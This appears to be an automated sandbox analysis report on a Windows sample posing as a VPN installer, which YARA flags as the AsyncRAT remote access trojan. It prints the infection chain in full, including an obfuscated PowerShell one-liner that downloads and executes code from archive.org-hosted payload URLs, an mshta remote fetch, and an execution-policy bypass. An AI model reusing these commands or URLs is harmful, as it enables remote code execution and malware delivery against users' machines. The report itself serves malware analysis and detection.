Source: powershell.exe, 00000003.00000002.484556145.0000027D9F8E4000.00000004.00000001.sdmp; String found in binary or memory: http://crl.microsoft
Source: aspnet_compiler.exe, 00000017.00000002.469001250.0000000000E65000.00000004.00000020.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: aspnet_compiler.exe, 00000017.00000002.469001250.0000000000E65000.00000004.00000020.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000003.00000002.478183437.0000027D87F0E000.00000004.00000001.sdmp; String found in binary or memory: http://ia601406.us.archive.org
Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmp; String found in binary or memory: http://ia803408.us.archive.org
Source: powershell.exe, 00000003.00000002.484556145.0000027D9F8E4000.00000004.00000001.sdmp; String found in binary or memory: http://microsoft.co
Source: powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: mshta.exe, 00000002.00000002.216634769.0000020091AF8000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.godaddy.com/0
Source: mshta.exe, 00000002.00000002.217675863.0000020893C10000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.484398533.0000027D9F8A2000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.godaddy.com/02
Source: mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.469024271.0000027D856CD000.00000004.00000020.sdmp; String found in binary or memory: http://ocsp.godaddy.com/05
Source: powershell.exe, 00000003.00000002.472681637.0000027D873CF000.00000004.00000001.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.472135094.0000027D871C1000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.472681637.0000027D873CF000.00000004.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmp; String found in binary or memory: https://archive.org
Source: powershell.exe, 00000003.00000002.477635897.0000027D87D15000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.478302181.0000027D87F6C000.00000004.00000001.sdmp; String found in binary or memory: https://archive.org/download/run-02-02-02/Run_02_02_02.TXT
Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmp; String found in binary or memory: https://archive.orgx
Source: mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.484398533.0000027D9F8A2000.00000004.00000001.sdmp; String found in binary or memory: https://certs.godaddy.com/repository/0
Source: powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.472681637.0000027D873CF000.00000004.00000001.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.480627087.0000027D88C97000.00000004.00000001.sdmp; String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.478105936.0000027D87EC6000.00000004.00000001.sdmp; String found in binary or memory: https://ia601406.us.archive.org
Source: powershell.exe, 00000003.00000002.484398533.0000027D9F8A2000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.478105936.0000027D87EC6000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.477673861.0000027D87D1D000.00000004.00000001.sdmp; String found in binary or memory: https://ia601406.us.archive.org/32/items/run-02-02-02/Run_02_02_02.TXT
Source: powershell.exe, 00000003.00000002.472681637.0000027D873CF000.00000004.00000001.sdmp; String found in binary or memory: https://ia601406.us.archive.org/9/items/server-lol-123_20210603/
Source: powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmp; String found in binary or memory: https://ia601406.us.archive.org/9/items/server-lol-123_20210603/Server_lol123.txt
Source: powershell.exe, 00000003.00000002.477673861.0000027D87D1D000.00000004.00000001.sdmp; String found in binary or memory: https://ia601406.us.archive.org/9/items/server-lol-123_20210603/Server_lol123.txt0ywI
Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmp; String found in binary or memory: https://ia601406.us.archive.org8
Source: powershell.exe, 00000003.00000002.478105936.0000027D87EC6000.00000004.00000001.sdmp; String found in binary or memory: https://ia601406.us.archive.orgx
Source: mshta.exe, 00000002.00000002.216563943.0000020091AC3000.00000004.00000020.sdmp; String found in binary or memory: https://ia601502.us.archive.org/
Source: mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmp, xGrfj8RvYg.exe; String found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt
Source: mshta.exe, 00000002.00000002.216688146.0000020091B21000.00000004.00000020.sdmp; String found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt...
Source: mshta.exe, 00000002.00000002.216688146.0000020091B21000.00000004.00000020.sdmp; String found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt...7l
Source: mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmp; String found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt0
          Source: mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt1
          Source: mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtC:
          Source: mshta.exe, 00000002.00000002.216513449.0000020091A66000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtQ
          Source: mshta.exe, 00000002.00000002.216513449.0000020091A66000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtf
          Source: mshta.exe, 00000002.00000002.216513449.0000020091A66000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txto
          Source: mshta.exe, 00000002.00000002.216513449.0000020091A66000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtr
          Source: mshta.exe, 00000002.00000002.216764785.0000020091CE0000.00000004.00000040.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txts
          Source: mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtst-MC:
          Source: xGrfj8RvYg.exe, 00000000.00000002.199598225.0000000002B51000.00000004.00000001.sdmp, mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtx
          Source: powershell.exe, 00000003.00000002.477168577.0000027D87BD2000.00000004.00000001.sdmpString found in binary or memory: https://ia601509.us.archive.org
          Source: powershell.exe, 00000003.00000003.210047788.0000027D9F8AB000.00000004.00000001.sdmpString found in binary or memory: https://ia601509.us.archive.org/
          Source: powershell.exe, 00000003.00000003.207800027.0000027D9F706000.00000004.00000001.sdmpString found in binary or memory: https://ia601509.us.archive.org/21/items
          Source: mshta.exe, mshta.exe, 00000002.00000002.217899024.0000020893D10000.00000004.00000001.sdmpString found in binary or memory: https://ia601509.us.archive.org/21/items/all-lol-123_20210603/AL
          Source: PowerShell_transcript.715575.7kfD7GZs.20210611063402.txt.3.dr, Clean_lol123[1].txt.2.drString found in binary or memory: https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT
          Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpString found in binary or memory: https://ia803408.us.archive.org
          Source: powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpString found in binary or memory: https://ia803408.us.archive.org/9/items/run-02-02-02/Run_02_02_02.TXT
          Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpString found in binary or memory: https://ia803408.us.archive.orgx
          Source: mshta.exe, 00000002.00000002.216563943.0000020091AC3000.00000004.00000020.sdmpString found in binary or memory: https://login.live.comq
          Source: powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownHTTPS traffic detected: 207.241.227.112:443 -> 192.168.2.3:49715 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          barindex
          Yara detected AsyncRAT
          Source: Yara matchFile source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.467029735.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6396, type: MEMORY
          Source: Yara matchFile source: 23.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 23.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow created: window name: CLIPBRDWNDCLASS

          System Summary:

          barindex
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAEDAE0E57
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAEDBB25E9
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAEDBB15ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 23_2_02ACD5F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 23_2_02AC9530
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 23_2_02AC8C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 23_2_02ACF298
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 23_2_02AC8918
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 25_2_0141D5AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 25_2_0141F5F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 25_2_0141D5A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 25_2_0141B8FC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 25_2_0141DB69
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 25_2_0141DB78
          Source: xGrfj8RvYg.exe, 00000000.00000002.199383295.0000000000F10000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs xGrfj8RvYg.exe
          Source: xGrfj8RvYg.exe, 00000000.00000000.196616953.00000000008C4000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNORD VPN.exe2 vs xGrfj8RvYg.exe
          Source: xGrfj8RvYg.exe, 00000000.00000002.199294357.0000000000E2A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs xGrfj8RvYg.exe
          Source: xGrfj8RvYg.exe, 00000000.00000002.199463500.0000000000F70000.00000002.00000001.sdmpBinary or memory string: originalfilename vs xGrfj8RvYg.exe
          Source: xGrfj8RvYg.exe, 00000000.00000002.199463500.0000000000F70000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs xGrfj8RvYg.exe
          Source: xGrfj8RvYg.exeBinary or memory string: OriginalFilenameNORD VPN.exe2 vs xGrfj8RvYg.exe
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscorjit.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscorjit.dll
          Source: 00000002.00000003.214415545.00000208942AB000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
          Source: 00000002.00000002.217899024.0000020893D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
          Source: 00000002.00000002.218422171.00000208942AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Clean_lol123[1].txt, type: DROPPEDMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 23.2.aspnet_compiler.exe.400000.0.unpack, Client/Settings.csBase64 encoded string: 'qkd/uccjEGFopaL8x4X62OjpEkF53RIrVmdHiIQT3o/oSel/ZFoI3BdUmWGHw1QXea71IOmDn7FuU2mCoQMVHQ==', 'hu2k5qJU3Ty2oDTj9+W03QlquYg2dD10GaZparwCdAkmRlNWAS0v22EB8YrQ8Uuf+ogLizH6sAwXxQtwm9V5kA==', ..., 'ieUFpXePoV+SLhE1mkNi838rLb1MrmgcD6jT/ToFxM4NwMgrxtupl3TG+gmecuvcCEnfuvzcUaxvKVL2Bjh9Ig==', 'PDhFyyKTiKYYUzBZG+73bNiREvjUdtm9jrHBghKK3CI434oJNToMdDpHb8z2JmoINzTXxC+KtllMwRsjolrdRg=='
          Source: 23.0.aspnet_compiler.exe.400000.0.unpack, Client/Settings.csBase64 encoded string: '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'
          Source: 23.0.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 23.0.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 23.2.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 23.2.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: classification engineClassification label: mal92.troj.evad.winEXE@12/12@5/7
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xGrfj8RvYg.exe.log
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1564:120:WilError_01
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ligmpoba.nku.ps1
          Source: xGrfj8RvYg.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeFile read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: unknownProcess created: C:\Users\user\Desktop\xGrfj8RvYg.exe 'C:\Users\user\Desktop\xGrfj8RvYg.exe'
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\-----Run+++++++++.ps1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\-----Run+++++++++.ps1
